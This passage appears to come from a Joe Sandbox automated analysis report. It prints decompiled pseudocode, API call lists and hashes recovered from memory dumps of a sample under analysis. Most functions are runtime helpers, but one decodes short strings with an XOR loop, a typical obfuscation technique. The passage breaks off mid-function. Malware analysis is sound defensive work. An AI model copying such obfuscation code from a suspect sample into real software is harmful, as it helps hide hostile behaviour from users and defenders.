                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Info$ByteCharMultiWide_strlen
                                                                    • String ID:
                                                                    • API String ID: 1335377746-0
                                                                    • Opcode ID: 903c2f2079a0ced3f9635df0d6a709253c2687ca414eda54a53d5a4150d6d9c9
                                                                    • Instruction ID: 8491ba68a7b28b21bc4dd99918f9cad46d6bb60cea3b2ed61df8530d040e7c81
                                                                    • Opcode Fuzzy Hash: 903c2f2079a0ced3f9635df0d6a709253c2687ca414eda54a53d5a4150d6d9c9
                                                                    • Instruction Fuzzy Hash: 20518B70A00269EBCF219F96FC8599FBBB9FF85760F60421EF815A2260D7354D40CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E0042707A() {
                                                                    				int _v4;
                                                                    				int _v8;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t7;
                                                                    				CHAR* _t8;
                                                                    				WCHAR* _t16;
                                                                    				int _t19;
                                                                    				char* _t23;
                                                                    				int _t24;
                                                                    				long _t28;
                                                                    				int _t29;
                                                                    				void* _t34;
                                                                    				intOrPtr _t35;
                                                                    				WCHAR* _t36;
                                                                    				CHAR* _t37;
                                                                    				intOrPtr _t38;
                                                                    				int _t40;
                                                                    
                                                                    				_t7 =  *0x4483c8; // 0x1
                                                                    				_t29 = 0;
                                                                    				_t36 = 0;
                                                                    				_t38 = 2;
                                                                    				if(_t7 != 0) {
                                                                    					L6:
                                                                    					__eflags = _t7 - 1;
                                                                    					if(__eflags != 0) {
                                                                    						__eflags = _t7 - _t38;
                                                                    						if(_t7 == _t38) {
                                                                    							L21:
                                                                    							_t8 = GetEnvironmentStrings();
                                                                    							_t37 = _t8;
                                                                    							__eflags = _t37 - _t29;
                                                                    							if(_t37 == _t29) {
                                                                    								L20:
                                                                    								return 0;
                                                                    							}
                                                                    							__eflags =  *_t37 - _t29;
                                                                    							if( *_t37 == _t29) {
                                                                    								L25:
                                                                    								_t39 = _t8 - _t37 + 1;
                                                                    								_t34 = E00422EEB(_t8 - _t37 + 1);
                                                                    								__eflags = _t34 - _t29;
                                                                    								if(_t34 != _t29) {
                                                                    									E00422FB0(_t34, _t37, _t39);
                                                                    								} else {
                                                                    									_t34 = 0;
                                                                    								}
                                                                    								FreeEnvironmentStringsA(_t37);
                                                                    								return _t34;
                                                                    							} else {
                                                                    								goto L23;
                                                                    							}
                                                                    							do {
                                                                    								do {
                                                                    									L23:
                                                                    									_t8 =  &(_t8[1]);
                                                                    									__eflags =  *_t8 - _t29;
                                                                    								} while ( *_t8 != _t29);
                                                                    								_t8 =  &(_t8[1]);
                                                                    								__eflags =  *_t8 - _t29;
                                                                    							} while ( *_t8 != _t29);
                                                                    							goto L25;
                                                                    						}
                                                                    						__eflags = _t7 - _t29;
                                                                    						if(_t7 == _t29) {
                                                                    							goto L21;
                                                                    						}
                                                                    						goto L20;
                                                                    					}
                                                                    					L7:
                                                                    					if(_t36 != _t29) {
                                                                    						L9:
                                                                    						_t16 = _t36;
                                                                    						if( *_t36 == _t29) {
                                                                    							L12:
                                                                    							_t35 =  *0x4300dc;
                                                                    							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                    							_v4 = _t19;
                                                                    							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                    							if(_t40 != _t29) {
                                                                    								_t23 = E00422EEB(_t40);
                                                                    								_v8 = _t23;
                                                                    								if(_t23 != _t29) {
                                                                    									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                    									_t52 = _t24;
                                                                    									if(_t24 == 0) {
                                                                    										_push(_v8);
                                                                    										E0042275E(_t29, _t35, _t36, _t52);
                                                                    										_v8 = _t29;
                                                                    									}
                                                                    									_t29 = _v8;
                                                                    								}
                                                                    							}
                                                                    							FreeEnvironmentStringsW(_t36);
                                                                    							return _t29;
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    						do {
                                                                    							do {
                                                                    								L10:
                                                                    								_t16 = _t16 + _t38;
                                                                    							} while ( *_t16 != _t29);
                                                                    							_t16 = _t16 + _t38;
                                                                    						} while ( *_t16 != _t29);
                                                                    						goto L12;
                                                                    					}
                                                                    					_t36 = GetEnvironmentStringsW();
                                                                    					if(_t36 == _t29) {
                                                                    						goto L20;
                                                                    					}
                                                                    					goto L9;
                                                                    				}
                                                                    				_t36 = GetEnvironmentStringsW();
                                                                    				if(_t36 == 0) {
                                                                    					_t28 = GetLastError();
                                                                    					__eflags = _t28 - 0x78;
                                                                    					if(_t28 != 0x78) {
                                                                    						_t7 =  *0x4483c8; // 0x1
                                                                    					} else {
                                                                    						_t7 = _t38;
                                                                    						 *0x4483c8 = _t7;
                                                                    					}
                                                                    					goto L6;
                                                                    				} else {
                                                                    					 *0x4483c8 = 1;
                                                                    					goto L7;
                                                                    				}
                                                                    			}























                                                                    0x0042707c
                                                                    0x0042708b
                                                                    0x0042708d
                                                                    0x00427093
                                                                    0x00427094
                                                                    0x004270c3
                                                                    0x004270c3
                                                                    0x004270c6
                                                                    0x00427145
                                                                    0x00427147
                                                                    0x00427151
                                                                    0x00427151
                                                                    0x00427157
                                                                    0x00427159
                                                                    0x0042715b
                                                                    0x0042714d
                                                                    0x00000000
                                                                    0x0042714d
                                                                    0x0042715d
                                                                    0x0042715f
                                                                    0x0042716b
                                                                    0x0042716e
                                                                    0x00427176
                                                                    0x00427178
                                                                    0x0042717b
                                                                    0x00427184
                                                                    0x0042717d
                                                                    0x0042717d
                                                                    0x0042717d
                                                                    0x0042718d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427162
                                                                    0x00427162
                                                                    0x00427166
                                                                    0x00427167
                                                                    0x00427167
                                                                    0x00000000
                                                                    0x00427161
                                                                    0x00427149
                                                                    0x0042714b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042714b
                                                                    0x004270c8
                                                                    0x004270ca
                                                                    0x004270d4
                                                                    0x004270d7
                                                                    0x004270d9
                                                                    0x004270e9
                                                                    0x004270e9
                                                                    0x004270f7
                                                                    0x004270fc
                                                                    0x00427102
                                                                    0x00427106
                                                                    0x00427109
                                                                    0x00427111
                                                                    0x00427115
                                                                    0x00427122
                                                                    0x00427124
                                                                    0x00427126
                                                                    0x00427128
                                                                    0x0042712c
                                                                    0x00427132
                                                                    0x00427132
                                                                    0x00427136
                                                                    0x00427136
                                                                    0x00427115
                                                                    0x0042713b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270dd
                                                                    0x004270e2
                                                                    0x004270e4
                                                                    0x00000000
                                                                    0x004270db
                                                                    0x004270ce
                                                                    0x004270d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004270d2
                                                                    0x00427098
                                                                    0x0042709c
                                                                    0x004270aa
                                                                    0x004270b0
                                                                    0x004270b3
                                                                    0x004270be
                                                                    0x004270b5
                                                                    0x004270b5
                                                                    0x004270b7
                                                                    0x004270b7
                                                                    0x00000000
                                                                    0x0042709e
                                                                    0x0042709e
                                                                    0x00000000
                                                                    0x0042709e

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427096
                                                                    • GetLastError.KERNEL32(?,?,?,?,00422D84,?,004303A8,00000060), ref: 004270AA
                                                                    • GetEnvironmentStringsW.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 004270CC
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74714DE0,00000000,?,?,?,?,00422D84), ref: 00427100
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427122
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 0042713B
                                                                    • GetEnvironmentStrings.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427151
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042718D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 883850110-0
                                                                    • Opcode ID: f338a5bae270a415dd9d7ed16629e9ec03c3c8e57567650c10dc5142803d4354
                                                                    • Instruction ID: ba2b8ba984046b5f27e92ab85f9a00d714186ba2064ddea9c65c530777ee0fd4
                                                                    • Opcode Fuzzy Hash: f338a5bae270a415dd9d7ed16629e9ec03c3c8e57567650c10dc5142803d4354
                                                                    • Instruction Fuzzy Hash: 8531407270C2346FE7202F657CC483BBAACEE15394B91053FF542C3340E62A8C5592AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E004181F0(void* __ecx) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				void* _v36;
                                                                    				void* _v40;
                                                                    				signed int _t55;
                                                                    				signed int _t57;
                                                                    				void* _t60;
                                                                    				void* _t62;
                                                                    				signed int _t64;
                                                                    				signed int _t75;
                                                                    				signed int _t76;
                                                                    				void* _t79;
                                                                    				intOrPtr* _t83;
                                                                    				void* _t87;
                                                                    				intOrPtr* _t88;
                                                                    				void* _t89;
                                                                    
                                                                    				_t89 =  &_v16;
                                                                    				_t62 = __ecx;
                                                                    				_t64 =  *0x447d20; // 0x0
                                                                    				_v8 = 0x7b;
                                                                    				_v7 = 0x7e;
                                                                    				_v6 = 0x6b;
                                                                    				_v5 = 0x7e;
                                                                    				_v4 = 0x32;
                                                                    				_v3 = 0x35;
                                                                    				_v2 = 0x3f;
                                                                    				_t76 = _t64;
                                                                    				_t87 = 0;
                                                                    				do {
                                                                    					_t8 = _t76 - 0x5d; // -93
                                                                    					_t76 = _t76 + ((_t8 ^ 0x0000147c) + (_t8 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t89 + _t87 + 0x14) =  *(_t89 + _t87 + 0x14) ^ 0x0000003f;
                                                                    					_t87 = _t87 + 1;
                                                                    				} while (_t87 < 7);
                                                                    				_v16 = 0x33;
                                                                    				_v13 = 0x33;
                                                                    				_v15 = 0x34;
                                                                    				_v14 = 0x10;
                                                                    				_v12 = 0x34;
                                                                    				_v11 = 0x3e;
                                                                    				_t79 = 0;
                                                                    				do {
                                                                    					_t23 = _t64 - 0x5d; // -93
                                                                    					_t64 = _t64 + ((_t23 ^ 0x0000147c) + (_t23 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t89 + _t79 + 0xc) =  *(_t89 + _t79 + 0xc) ^ 0x0000003e;
                                                                    					_t79 = _t79 + 1;
                                                                    				} while (_t79 < 6);
                                                                    				_t83 =  *0x43003c;
                                                                    				_push( &_v8);
                                                                    				if(E00419410( *_t83(), __ecx,  &_v12, _t53) != 0xffffffff) {
                                                                    					_t88 = __ecx + 0x24;
                                                                    					_push(_t88);
                                                                    					_t55 = E004180B0();
                                                                    					__eflags = _t55;
                                                                    					if(_t55 != 0) {
                                                                    						L11:
                                                                    						return _t55;
                                                                    					} else {
                                                                    						__eflags =  *_t88 - 0x162;
                                                                    						if(__eflags == 0) {
                                                                    							_t57 = E0040C340( *((intOrPtr*)(_t89 + 0x24)), __eflags, _t62,  *((intOrPtr*)(_t89 + 0x20)));
                                                                    							__eflags = _t57;
                                                                    							if(_t57 == 0) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_t60 = E00419410( *_t83(_t89 + 0xc), _t62, _t89 + 0x10, _t59);
                                                                    								__eflags = _t60 - 0xffffffff;
                                                                    								_t75 = (0 | _t60 != 0xffffffff) - 0x00000001 & 0x00000007;
                                                                    								__eflags = _t75;
                                                                    								_t55 = _t75;
                                                                    								goto L11;
                                                                    							}
                                                                    						} else {
                                                                    							return 8;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					L5:
                                                                    					return 7;
                                                                    				}
                                                                    			}






























                                                                    0x004181f0
                                                                    0x004181f5
                                                                    0x004181f7
                                                                    0x00418200
                                                                    0x00418205
                                                                    0x00418209
                                                                    0x0041820e
                                                                    0x00418212
                                                                    0x00418217
                                                                    0x0041821c
                                                                    0x00418221
                                                                    0x00418223
                                                                    0x00418225
                                                                    0x00418225
                                                                    0x00418239
                                                                    0x0041823f
                                                                    0x00418243
                                                                    0x00418244
                                                                    0x0041824d
                                                                    0x00418251
                                                                    0x00418255
                                                                    0x00418259
                                                                    0x0041825e
                                                                    0x00418262
                                                                    0x00418267
                                                                    0x00418270
                                                                    0x00418270
                                                                    0x00418284
                                                                    0x0041828a
                                                                    0x0041828e
                                                                    0x0041828f
                                                                    0x00418294
                                                                    0x0041829e
                                                                    0x004182b1
                                                                    0x004182c1
                                                                    0x004182c4
                                                                    0x004182c7
                                                                    0x004182cc
                                                                    0x004182ce
                                                                    0x0041831b
                                                                    0x00418321
                                                                    0x004182d0
                                                                    0x004182d0
                                                                    0x004182d6
                                                                    0x004182f0
                                                                    0x004182f5
                                                                    0x004182f7
                                                                    0x00000000
                                                                    0x004182f9
                                                                    0x00418308
                                                                    0x0041830f
                                                                    0x00418316
                                                                    0x00418316
                                                                    0x00418319
                                                                    0x00000000
                                                                    0x00418319
                                                                    0x004182d8
                                                                    0x004182e3
                                                                    0x004182e3
                                                                    0x004182d6
                                                                    0x004182b3
                                                                    0x004182b3
                                                                    0x004182be
                                                                    0x004182be

                                                                    APIs
                                                                    • lstrlen.KERNEL32(0000007B), ref: 0041829F
                                                                    • lstrlen.KERNEL32(?,?,?,00000000), ref: 004182FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: 2$5$>$?$k${
                                                                    • API String ID: 1659193697-1582361192
                                                                    • Opcode ID: e7f0358b6a6750a17489cf01af993e1e7863c6de51b3ab0213c66aa97795c57a
                                                                    • Instruction ID: b54a9745a3754593113dd8cf9dde3e855b0ddebd7efce6c766b199bf35de5c17
                                                                    • Opcode Fuzzy Hash: e7f0358b6a6750a17489cf01af993e1e7863c6de51b3ab0213c66aa97795c57a
                                                                    • Instruction Fuzzy Hash: A431043520C7818AD315DB2898806DFBBD89FE5318F044DAEE4D187292DA79D64EC7B3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E00427CEB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t42;
                                                                    				void* _t43;
                                                                    				short* _t45;
                                                                    				int _t58;
                                                                    				int _t62;
                                                                    				long _t65;
                                                                    				int _t67;
                                                                    				void* _t69;
                                                                    				short* _t77;
                                                                    				short* _t78;
                                                                    				int _t79;
                                                                    				short* _t83;
                                                                    				short* _t84;
                                                                    				void* _t85;
                                                                    				short* _t86;
                                                                    				void* _t91;
                                                                    
                                                                    				_t69 = __ecx;
                                                                    				_push(0x1c);
                                                                    				_push(0x430bb8);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t83 = 0;
                                                                    				_t91 =  *0x448424 - _t83; // 0x1
                                                                    				if(_t91 == 0) {
                                                                    					if(GetStringTypeW(1, 0x430bb4, 1, _t85 - 0x1c) == 0) {
                                                                    						_t65 = GetLastError();
                                                                    						__eflags = _t65 - 0x78;
                                                                    						if(_t65 == 0x78) {
                                                                    							 *0x448424 = 2;
                                                                    						}
                                                                    					} else {
                                                                    						 *0x448424 = 1;
                                                                    					}
                                                                    				}
                                                                    				_t42 =  *0x448424; // 0x1
                                                                    				if(_t42 == 2 || _t42 == _t83) {
                                                                    					_t67 =  *(_t85 + 0x1c);
                                                                    					__eflags = _t67 - _t83;
                                                                    					if(_t67 == _t83) {
                                                                    						_t67 =  *0x448460; // 0x0
                                                                    					}
                                                                    					_t77 =  *(_t85 + 0x18);
                                                                    					__eflags = _t77;
                                                                    					if(_t77 == 0) {
                                                                    						_t77 =  *0x448470; // 0x0
                                                                    					}
                                                                    					_t43 = E004298A2(_t67);
                                                                    					__eflags = _t43 - 0xffffffff;
                                                                    					if(_t43 != 0xffffffff) {
                                                                    						__eflags = _t43 - _t77;
                                                                    						if(__eflags == 0) {
                                                                    							L29:
                                                                    							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                    							__eflags = _t83;
                                                                    							if(__eflags != 0) {
                                                                    								_push(_t83);
                                                                    								E0042275E(_t67, _t78, _t83, __eflags);
                                                                    							}
                                                                    							_t45 = _t78;
                                                                    							goto L32;
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(_t85 + 0x10);
                                                                    						_push( *(_t85 + 0xc));
                                                                    						_push(_t43);
                                                                    						_push(_t77);
                                                                    						_t83 = E004298E5(_t67, _t77, _t83, __eflags);
                                                                    						__eflags = _t83;
                                                                    						if(_t83 == 0) {
                                                                    							goto L25;
                                                                    						}
                                                                    						 *(_t85 + 0xc) = _t83;
                                                                    						goto L29;
                                                                    					} else {
                                                                    						goto L25;
                                                                    					}
                                                                    				} else {
                                                                    					if(_t42 != 1) {
                                                                    						L25:
                                                                    						_t45 = 0;
                                                                    						L32:
                                                                    						return E00424267(_t45);
                                                                    					}
                                                                    					 *(_t85 - 0x24) = _t83;
                                                                    					 *(_t85 - 0x20) = _t83;
                                                                    					if( *(_t85 + 0x18) == _t83) {
                                                                    						_t62 =  *0x448470; // 0x0
                                                                    						 *(_t85 + 0x18) = _t62;
                                                                    					}
                                                                    					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                    					 *(_t85 - 0x28) = _t79;
                                                                    					if(_t79 == 0) {
                                                                    						goto L25;
                                                                    					} else {
                                                                    						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                    						_t68 = _t79 + _t79;
                                                                    						E00422920(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                    						 *(_t85 - 0x18) = _t86;
                                                                    						_t84 = _t86;
                                                                    						 *(_t85 - 0x2c) = _t84;
                                                                    						E004282F0(_t84, 0, _t79 + _t79);
                                                                    						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                    						_t99 = _t84;
                                                                    						if(_t84 != 0) {
                                                                    							L15:
                                                                    							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                    							if(_t58 != 0) {
                                                                    								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                    							}
                                                                    							_t102 =  *(_t85 - 0x20);
                                                                    							if( *(_t85 - 0x20) != 0) {
                                                                    								_push(_t84);
                                                                    								E0042275E(_t68, _t79, _t84, _t102);
                                                                    							}
                                                                    							_t45 =  *(_t85 - 0x24);
                                                                    							goto L32;
                                                                    						} else {
                                                                    							_push(_t79);
                                                                    							_push(2);
                                                                    							_t84 = E00427472(_t68, _t79, _t84, _t99);
                                                                    							if(_t84 == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							 *(_t85 - 0x20) = 1;
                                                                    							goto L15;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}



















                                                                    0x00427ceb
                                                                    0x00427ceb
                                                                    0x00427ced
                                                                    0x00427cf2
                                                                    0x00427cf7
                                                                    0x00427cf9
                                                                    0x00427cff
                                                                    0x00427d17
                                                                    0x00427d21
                                                                    0x00427d27
                                                                    0x00427d2a
                                                                    0x00427d2c
                                                                    0x00427d2c
                                                                    0x00427d19
                                                                    0x00427d19
                                                                    0x00427d19
                                                                    0x00427d17
                                                                    0x00427d36
                                                                    0x00427d3e
                                                                    0x00427e2e
                                                                    0x00427e31
                                                                    0x00427e33
                                                                    0x00427e35
                                                                    0x00427e35
                                                                    0x00427e3b
                                                                    0x00427e3e
                                                                    0x00427e40
                                                                    0x00427e42
                                                                    0x00427e42
                                                                    0x00427e49
                                                                    0x00427e4f
                                                                    0x00427e52
                                                                    0x00427e58
                                                                    0x00427e5a
                                                                    0x00427e7a
                                                                    0x00427e8d
                                                                    0x00427e8f
                                                                    0x00427e91
                                                                    0x00427e93
                                                                    0x00427e94
                                                                    0x00427e99
                                                                    0x00427e9a
                                                                    0x00000000
                                                                    0x00427e9a
                                                                    0x00427e5c
                                                                    0x00427e5e
                                                                    0x00427e63
                                                                    0x00427e64
                                                                    0x00427e67
                                                                    0x00427e68
                                                                    0x00427e71
                                                                    0x00427e73
                                                                    0x00427e75
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427e77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427d4c
                                                                    0x00427d4f
                                                                    0x00427e54
                                                                    0x00427e54
                                                                    0x00427e9c
                                                                    0x00427ea4
                                                                    0x00427ea4
                                                                    0x00427d55
                                                                    0x00427d58
                                                                    0x00427d5e
                                                                    0x00427d60
                                                                    0x00427d65
                                                                    0x00427d65
                                                                    0x00427d89
                                                                    0x00427d8b
                                                                    0x00427d90
                                                                    0x00000000
                                                                    0x00427d96
                                                                    0x00427d96
                                                                    0x00427d9a
                                                                    0x00427da5
                                                                    0x00427daa
                                                                    0x00427dad
                                                                    0x00427daf
                                                                    0x00427db6
                                                                    0x00427dbe
                                                                    0x00427dd9
                                                                    0x00427ddb
                                                                    0x00427df4
                                                                    0x00427e01
                                                                    0x00427e09
                                                                    0x00427e19
                                                                    0x00427e19
                                                                    0x00427e1c
                                                                    0x00427e20
                                                                    0x00427e22
                                                                    0x00427e23
                                                                    0x00427e28
                                                                    0x00427e29
                                                                    0x00000000
                                                                    0x00427ddd
                                                                    0x00427ddd
                                                                    0x00427dde
                                                                    0x00427de7
                                                                    0x00427deb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427ded
                                                                    0x00000000
                                                                    0x00427ded
                                                                    0x00427ddb
                                                                    0x00427d90

                                                                    APIs
                                                                    • GetStringTypeW.KERNEL32(00000001,00430BB4,00000001,?,00430BB8,0000001C,0042762B,00000001,00000020,00000100,?,00000000), ref: 00427D0F
                                                                    • GetLastError.KERNEL32 ref: 00427D21
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0042788D,00000000,00000000,00430BB8,0000001C,0042762B,00000001,00000020,00000100,?,00000000), ref: 00427D83
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0042788D,?,00000000), ref: 00427E01
                                                                    • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00427E13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3581945363-0
                                                                    • Opcode ID: b056715b550e6fd833b5b25fb7c2f7398c57303813bf45ede617173ad98716fb
                                                                    • Instruction ID: bb06f430a6aecdfc07f9e5044103d3faa1161a53df0707740868c83fed3b13fd
                                                                    • Opcode Fuzzy Hash: b056715b550e6fd833b5b25fb7c2f7398c57303813bf45ede617173ad98716fb
                                                                    • Instruction Fuzzy Hash: 4541E332A04239EBCF219F60EC45AAF7B74FF49B60F51015AF814A6251DB398D11CBAC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00428EC6(void* __ecx, intOrPtr* _a4, signed int* _a8, CHAR* _a12, signed int _a16, signed int _a20) {
                                                                    				signed int _v5;
                                                                    				char _v6;
                                                                    				signed int _v12;
                                                                    				long _v16;
                                                                    				signed char _v18;
                                                                    				long _v20;
                                                                    				struct _SECURITY_ATTRIBUTES _v32;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t82;
                                                                    				signed int _t84;
                                                                    				signed char _t85;
                                                                    				signed int _t93;
                                                                    				signed int _t94;
                                                                    				signed int _t100;
                                                                    				signed int* _t102;
                                                                    				long _t103;
                                                                    				signed int _t107;
                                                                    				signed int* _t112;
                                                                    				signed int _t115;
                                                                    				void* _t117;
                                                                    				long _t119;
                                                                    				signed int _t120;
                                                                    				intOrPtr* _t121;
                                                                    				void* _t122;
                                                                    				signed int _t131;
                                                                    				signed char _t134;
                                                                    				signed int _t138;
                                                                    				long _t141;
                                                                    				void* _t142;
                                                                    				signed int _t144;
                                                                    				void* _t153;
                                                                    
                                                                    				_t122 = __ecx;
                                                                    				_t134 = _a16;
                                                                    				_v32.nLength = 0xc;
                                                                    				_v32.lpSecurityDescriptor = 0;
                                                                    				if(_t134 >= 0) {
                                                                    					_v32.bInheritHandle = 1;
                                                                    					_v5 = 0;
                                                                    				} else {
                                                                    					_v32.bInheritHandle = 0;
                                                                    					_v5 = 0x10;
                                                                    				}
